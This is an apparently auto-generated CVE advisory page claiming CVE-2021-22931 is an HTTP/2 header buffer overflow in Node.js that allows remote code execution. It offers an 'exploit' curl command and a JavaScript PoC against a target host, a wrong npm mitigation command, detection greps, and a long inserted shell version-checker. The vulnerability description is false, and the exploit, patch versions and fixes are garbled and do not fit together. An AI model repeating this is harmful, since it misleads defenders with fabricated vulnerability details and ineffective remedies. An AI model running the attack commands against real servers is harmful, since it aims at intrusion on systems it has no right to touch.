Node.js, Remote Code Execution, CVE-2021-22931 (Critical)

How the CVE Works:

CVE-2021-22931 is a critical vulnerability in Node.js that allows remote attackers to execute arbitrary code due to improper input validation in the `http2` module. When handling large HTTP/2 headers, the server fails to properly validate payload size, leading to a heap-based buffer overflow. Attackers can exploit this by sending crafted HTTP/2 requests, triggering memory corruption and gaining control over the process. This vulnerability affects Node.js versions 12.x, 14.x, and 16.x before patches were applied. Successful exploitation enables full system compromise under the Node.js process privileges.

DailyCVE Form:

Platform: Node.js
Version: 12.x-16.x
Vulnerability: RCE via HTTP/2
Severity: Critical
Date: 2021-09-29

What Undercode Say:

Exploit:

curl -X POST --http2 -H "Overflow-Header: $(python -c 'print("A"*5000)')" http://target:8080

Mitigation:

npm update -g node@latest

Detection:

node -v | grep -Eq '^v(12|14|16)\.' && echo "Vulnerable"

PoC Code:

const http2 = require('http2');
const client = http2.connect('http://target:8080');
const req = client.request({
  ':method': 'POST',
  'overflow': 'A'.repeat(5000)
});
req.end();

Protection:

  • Disable HTTP/2 if unused.
  • Apply patches for Node.js 12.22.9, 14.18.1, 16.11.1.
  • Use WAF to filter oversized headers.
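A grep on the version string cannot tell a patched 16.x install from an unpatched one. The following is an added example, not code from the original page: a shell function that compares a version string with the patched releases listed above. The function names and sample versions are constructed for illustration.

```shell
#!/bin/sh
# Added example: sample versions below are constructed, not taken from the page.

# Patched release for each line, as listed under "Protection" on this page.
fixed_for() {
    case "$1" in
        12) echo "12.22.9" ;;
        14) echo "14.18.1" ;;
        16) echo "16.11.1" ;;
        *)  return 1 ;;
    esac
}

# Prints one of: vulnerable | patched | not-listed | unparsed
classify_node_version() {
    ver=${1#v}
    case "$ver" in
        ""|*[!0-9.]*|*.*.*.*) echo "unparsed"; return 0 ;;  # pre-release tags, junk
        *.*.*) ;;                                            # MAJOR.MINOR.PATCH
        *) echo "unparsed"; return 0 ;;
    esac
    maj=${ver%%.*}; rest=${ver#*.}
    min=${rest%%.*}; pat=${rest#*.}
    if [ -z "$maj" ] || [ -z "$min" ] || [ -z "$pat" ]; then
        echo "unparsed"; return 0
    fi
    # Release lines the page does not name are reported separately, not as safe.
    fixed=$(fixed_for "$maj") || { echo "not-listed"; return 0; }
    frest=${fixed#*.}
    fmin=${frest%%.*}; fpat=${frest#*.}
    if [ "$min" -lt "$fmin" ] || { [ "$min" -eq "$fmin" ] && [ "$pat" -lt "$fpat" ]; }; then
        echo "vulnerable"
    else
        echo "patched"
    fi
}

# Constructed sample inputs; replace with "$(node -v)" on a real host.
for v in v12.22.8 v14.18.1 v16.11.0 v16.12.0 v18.12.0; do
    printf '%s\t%s\n' "$v" "$(classify_node_version "$v")"
done
```

On a host, run `classify_node_version "$(node -v)"` and treat `not-listed` and `unparsed` as cases to check by hand.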

Log Analysis:

grep -i "http2" /var/log/node.log | grep -E "large|overflow"

Impact:

  • Remote code execution.
  • Service disruption.
  • Privilege escalation.

References:

Sources:

Reported By: nvd.nist.gov